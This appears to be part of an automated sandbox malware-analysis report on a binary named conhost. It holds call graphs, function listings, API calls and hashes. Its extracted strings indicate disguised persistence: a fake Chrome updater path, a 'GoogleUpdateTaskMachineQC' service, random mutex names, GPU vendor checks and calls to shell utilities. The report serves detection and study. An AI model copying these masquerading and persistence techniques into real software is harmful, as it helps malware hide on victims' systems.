2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 2985->2986 2987 1400015f3 2986->2987 2987->2386

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
                                                                    callgraph 0 Function_00000001400026E1 1 Function_00000001400063E1 2 Function_0000000140001AE4 36 Function_0000000140001D40 2->36 80 Function_0000000140001BA0 2->80 3 Function_00000001400014E5 76 Function_0000000140001394 3->76 4 Function_0000000140002FF0 60 Function_0000000140001370 4->60 5 Function_00000001400010F0 6 Function_00000001400065F1 7 Function_00000001400062F1 8 Function_00000001400031F1 9 Function_00000001400014F4 9->76 10 Function_0000000140001800 71 Function_0000000140002290 10->71 11 Function_0000000140002500 12 Function_0000000140001000 13 Function_0000000140001E00 12->13 42 Function_0000000140001750 12->42 89 Function_0000000140001FB0 12->89 95 Function_0000000140001FC0 12->95 14 Function_0000000140006501 15 Function_0000000140001503 15->76 16 Function_0000000140001404 16->76 17 Function_0000000140002104 18 Function_0000000140001E10 19 Function_0000000140003210 20 Function_0000000140006311 21 Function_0000000140006411 22 Function_0000000140001512 22->76 23 Function_0000000140002320 24 Function_0000000140002420 25 Function_0000000140001521 25->76 26 Function_0000000140001422 26->76 27 Function_0000000140001530 27->76 28 Function_0000000140003230 29 Function_0000000140001431 29->76 30 Function_0000000140006431 31 Function_0000000140006331 32 Function_000000014000153F 32->76 33 Function_0000000140001440 33->76 34 Function_0000000140006440 35 Function_0000000140006940 67 Function_0000000140006680 35->67 36->71 37 Function_0000000140001140 49 Function_0000000140001160 37->49 38 Function_0000000140003141 39 Function_0000000140001F47 59 Function_0000000140001870 39->59 40 Function_0000000140002050 41 Function_0000000140003250 41->4 41->15 41->25 41->26 41->27 41->29 41->32 41->33 47 Function_000000014000145E 41->47 50 Function_0000000140002660 41->50 56 Function_000000014000156C 41->56 57 Function_000000014000146D 41->57 41->60 65 Function_000000014000157B 41->65 41->67 78 Function_0000000140001599 41->78 86 Function_00000001400015A8 41->86 87 Function_00000001400014A9 41->87 94 Function_00000001400016C0 41->94 102 Function_00000001400027D0 41->102 106 Function_00000001400014D6 41->106 43 Function_0000000140001650 44 Function_0000000140002751 45 Function_0000000140006351 46 Function_000000014000155D 46->76 47->76 48 Function_0000000140001760 108 Function_00000001400020E0 48->108 49->41 49->49 49->59 66 Function_0000000140001880 49->66 70 Function_0000000140001F90 49->70 49->94 51 Function_0000000140002460 52 Function_0000000140003160 53 Function_0000000140006660 54 Function_0000000140006461 55 Function_0000000140001E65 55->59 56->76 57->76 58 Function_000000014000216F 61 Function_0000000140001A70 61->36 61->80 62 Function_0000000140002770 63 Function_0000000140006371 64 Function_0000000140006571 65->76 66->24 66->36 66->50 66->80 68 Function_0000000140003180 69 Function_0000000140006690 69->67 72 Function_0000000140002590 73 Function_0000000140002790 74 Function_0000000140002691 75 Function_0000000140006491 76->35 76->69 77 Function_0000000140002194 77->59 78->76 79 Function_000000014000219E 80->36 88 Function_00000001400023B0 80->88 101 Function_00000001400024D0 80->101 81 Function_0000000140001FA0 82 Function_00000001400027A0 83 Function_00000001400031A1 84 Function_00000001400063A1 85 Function_00000001400065A1 86->76 87->76 90 Function_00000001400022B0 91 Function_00000001400026B0 92 Function_00000001400027B1 93 Function_0000000140001AB3 93->36 93->80 96 Function_00000001400063C1 97 Function_00000001400064C1 98 Function_0000000140001AC3 98->36 98->80 99 Function_00000001400014C7 99->76 100 Function_0000000140001FD0 102->3 102->9 102->15 102->22 102->46 102->47 102->50 102->60 102->67 102->87 102->99 103 Function_00000001400017D0 104 Function_00000001400026D0 105 Function_0000000140001AD4 105->36 105->80 106->76 107 Function_00000001400017E0 107->108 109 Function_00000001400022E0

                                                                    Executed Functions

                                                                    Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • NtQueryInformationFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileInformationQuery
                                                                    • String ID:
                                                                    • API String ID: 365787318-0
                                                                    • Opcode ID: 36523fda6eca0ee512bde486ae1e8954491fab6c76cc6521f032f1d5cf9c1036
                                                                    • Instruction ID: c5c377e216d660e8bb6bb0cefb1630b72abf422e51d1fd79f54a2d93a1040c4d
                                                                    • Opcode Fuzzy Hash: 36523fda6eca0ee512bde486ae1e8954491fab6c76cc6521f032f1d5cf9c1036
                                                                    • Instruction Fuzzy Hash: 6AF0AFB2608B408AEA12DF62F85179A77A5F38C7C0F009919BBC853735DB3CC190CB40

                                                                    Non-executed Functions

                                                                    Function 0000000140003250 Relevance: 152.6, APIs: 62, Strings: 24, Instructions: 2072COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                                                    • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\bzoteldvymki$\BaseNamedObjects\paiwqsbipblamcnmtpdktrir$\BaseNamedObjects\vazasxarlpknfxrw$\Google\Chrome\updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
                                                                    • API String ID: 3506639089-941377090
                                                                    • Opcode ID: 0cda6c72a2f06585f01c0bb1b43b4488e8f849583809ff9edc4bdafd39976df0
                                                                    • Instruction ID: ef81d73e35cacb278a3ce7412ee70fca3090d70b6629413a1a3bc68791ba6f30
                                                                    • Opcode Fuzzy Hash: 0cda6c72a2f06585f01c0bb1b43b4488e8f849583809ff9edc4bdafd39976df0
                                                                    • Instruction Fuzzy Hash: 265339F1924BC198F723CB3AB8467E56360BB9D3C8F445316BB84676B2EB794285C305
                                                                    Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006680 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                    • String ID: 0$X$\BaseNamedObjects\vazasxarlpknfxrw$`
                                                                    • API String ID: 780471329-3676218624
                                                                    • Opcode ID: b56d83db8cdb47bce62b63e0037989871a34e5e5dd9058d4d1577b6850bedc45
                                                                    • Instruction ID: bd1111813274a2185e4a5405d25f62c07457be827839ad4c247fbb5e796227d6
                                                                    • Opcode Fuzzy Hash: b56d83db8cdb47bce62b63e0037989871a34e5e5dd9058d4d1577b6850bedc45
                                                                    • Instruction Fuzzy Hash: FA1259B2618B8481E762CB1AF8443EA77A4F789794F418215EBAC57BF5DF78C189C700
                                                                    Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 2643109117-0
                                                                    • Opcode ID: d1db83e79def031ab80d1deba41aed6449390b13d4d6d748f75fc006707f133e
                                                                    • Instruction ID: 4457a89b35f4aef33ffd38620d4ede58944eca37ecfc9223689a444f894f5de4
                                                                    • Opcode Fuzzy Hash: d1db83e79def031ab80d1deba41aed6449390b13d4d6d748f75fc006707f133e
                                                                    • Instruction Fuzzy Hash: 855101F1615A4485FA16EF27F9947EA27A1BB8C7D0F449125FB4D873B2DF3884958300
                                                                    Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 507 140001c04 504->507 505->502 505->503 511 140001cd7-140001cf3 memcpy 507->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                    • API String ID: 2595394609-2123141913
                                                                    • Opcode ID: 2a584a706622e52ade0fcab731ee33d1777f307b9fa9d7d0bf991f3a34367caa
                                                                    • Instruction ID: 1161044a75eb1e7cd09bc24417fd150d5724ba9878afa94a0ebc1ae4739ba328
                                                                    • Opcode Fuzzy Hash: 2a584a706622e52ade0fcab731ee33d1777f307b9fa9d7d0bf991f3a34367caa
                                                                    • Instruction Fuzzy Hash: 0F4132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                                    Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 533 14000220b-140002212 LeaveCriticalSection 531->533 534 14000212e-14000213c 531->534 535 140002272-140002280 532->535 536 140002223-14000222d 532->536 533->532 539 14000214d-140002159 TlsGetValue GetLastError 534->539 537 140002241-140002263 DeleteCriticalSection 536->537 538 14000222f 536->538 537->535 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->533 542->539 543->542
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                    • String ID:
                                                                    • API String ID: 3326252324-0
                                                                    • Opcode ID: bcf1c14129559fff498e2fab62ae5e52fccf0f5f2b7621f1284fde4cab1a4794
                                                                    • Instruction ID: e3a015b4a75ce14096daf75d7f598576e46144e8d1edeea3fbfa6c29d12a9d61
                                                                    • Opcode Fuzzy Hash: bcf1c14129559fff498e2fab62ae5e52fccf0f5f2b7621f1284fde4cab1a4794
                                                                    • Instruction Fuzzy Hash: 8021B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300
                                                                    Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 556 140001f23-140001f2d 552->556 557 140001ed3-140001ee2 signal 552->557 554 140001eb5-140001eba 553->554 555 140001efb-140001f0a call 140006c40 553->555 554->548 562 140001ec0 554->562 555->556 566 140001f0c-140001f10 555->566 560 140001f43-140001f45 556->560 561 140001f2f-140001f3f 556->561 557->556 558 140001ee4-140001ee8 557->558 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->556 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CCG
                                                                    • API String ID: 0-1584390748
                                                                    • Opcode ID: dd8133f626706b62a136801e6f14d89df3933c56dad94dca13a3ea9b55e7724d
                                                                    • Instruction ID: 3456a1c84c2a53dd5aa6e48d6b89ab24717cda018660fff4778c7de244838e1d
                                                                    • Opcode Fuzzy Hash: dd8133f626706b62a136801e6f14d89df3933c56dad94dca13a3ea9b55e7724d
                                                                    • Instruction Fuzzy Hash: 5E214CB1B4150542FA7BDA2BF5903F91192ABCC7E4F258535FF5A473F5DE3888828241
                                                                    Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 580 14000194d-140001954 578->580 581 14000191e-140001929 578->581 579->580 582 140001943-140001947 579->582 585 140001956-140001961 580->585 586 14000199e-1400019a6 580->586 581->580 583 14000192b-14000193a 581->583 582->580 584 140001a20-140001a26 582->584 583->579 588 140001b87-140001b98 call 140001d40 584->588 589 140001a2c-140001a37 584->589 590 140001970-14000199c call 140001ba0 585->590 586->572 587 1400019a8-1400019c1 586->587 591 1400019df-1400019e7 587->591 589->586 592 140001a3d-140001a5f 589->592 590->586 595 1400019e9-140001a0d VirtualProtect 591->595 596 1400019d0-1400019dd 591->596 597 140001a7d-140001a97 592->597 595->596 596->572 596->591 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->588 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                    • API String ID: 544645111-395989641
                                                                    • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                                    • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                                    • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                                    • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                    Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-3474627141
                                                                    • Opcode ID: eb152ed10c2c1a9f974652424f988c556df87c33465b9ce34772e34cbd9d02d8
                                                                    • Instruction ID: f616287742e50a73d89ee1abed936dc904873cdc8678ebe312197a385c6e0082
                                                                    • Opcode Fuzzy Hash: eb152ed10c2c1a9f974652424f988c556df87c33465b9ce34772e34cbd9d02d8
                                                                    • Instruction Fuzzy Hash: 71F06271A14A4482E612EB6AB9417E96361E75D7C1F509221FF4DA76A2DF38D1828310
                                                                    Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
